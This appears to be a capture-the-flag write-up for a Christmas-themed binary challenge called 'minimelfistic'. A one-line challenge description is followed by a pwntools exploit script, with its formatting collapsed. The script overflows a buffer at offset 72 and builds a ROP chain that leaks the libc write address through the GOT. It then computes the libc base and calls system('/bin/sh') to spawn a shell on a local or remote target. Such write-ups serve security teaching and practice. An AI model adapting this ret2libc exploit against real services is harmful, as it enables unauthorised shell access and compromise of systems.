The Elves finally understood what went wrong with all their plans. They were too fancy and obvious! But, this one is different.. It's a security system, but the alarm rings whenever Santa's house is vulnerable to an attack. Will you manage to deactivate it? p.s. Sound on!
Solution
from pwn import*defstart(argv=[],*a,**kw):if args.GDB:# Set GDBscript belowreturn gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)elif args.REMOTE:# ('server', 'port')returnremote(sys.argv[1], sys.argv[2], *a, **kw)else:# Run locallyreturnprocess([exe] + argv, *a, **kw)# Specify your GDB script here for debugginggdbscript ='''init-pwndbgcontinue'''.format(**locals())# Set up pwntools for the correct architectureexe ='./minimelfistic'# This will automatically get context arch, bits, os etcelf = context.binary =ELF(exe, checksec=False)# Enable verbose logging so we can see exactly what is being sent (info/debug)context.log_level ='info'# ===========================================================# EXPLOIT GOES HERE# ===========================================================# Lib-C library# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') # Locallibc =ELF('libc.so.6')# Remote# Pass in pattern_size, get back EIP/RIP offsetoffset =72ret =0x400616# Stack alignment# Start programio =start()# Create a ROP object to handle complexitiesrop =ROP(elf)# Payload to leak libc function# No puts() so use write()rop.banner()rop.write(1, elf.got.write)rop.main()# We need the '9' or we won't get out of infinite looppayload =flat([ b'9'+ (asm('nop') * (71)), rop.chain()])# Send the payloadio.sendlineafter(b'>', payload)io.recvlines(41)# the banner# Retrieve got.write addressgot_write =unpack(io.recvline()[:6].ljust(8, b"\x00"))info("leaked got_write: %#x", got_write)# Subtract write offset to get libc baselibc.address = got_write - libc.symbols.writeinfo("libc_base: %#x", libc.address)# Reset ROP object with libc binaryrop =ROP(libc)# Call ROP system, passing location of "/bin/sh" stringrop.system(next(libc.search(b'/bin/sh\x00')))# We need the '9' or we won't get out of infinite looppayload =flat([ b'9'+ (asm('nop') * (offset -1)), ret, rop.chain()])# Send the payloadio.sendlineafter(b'>', payload)# Got Shell?io.interactive()
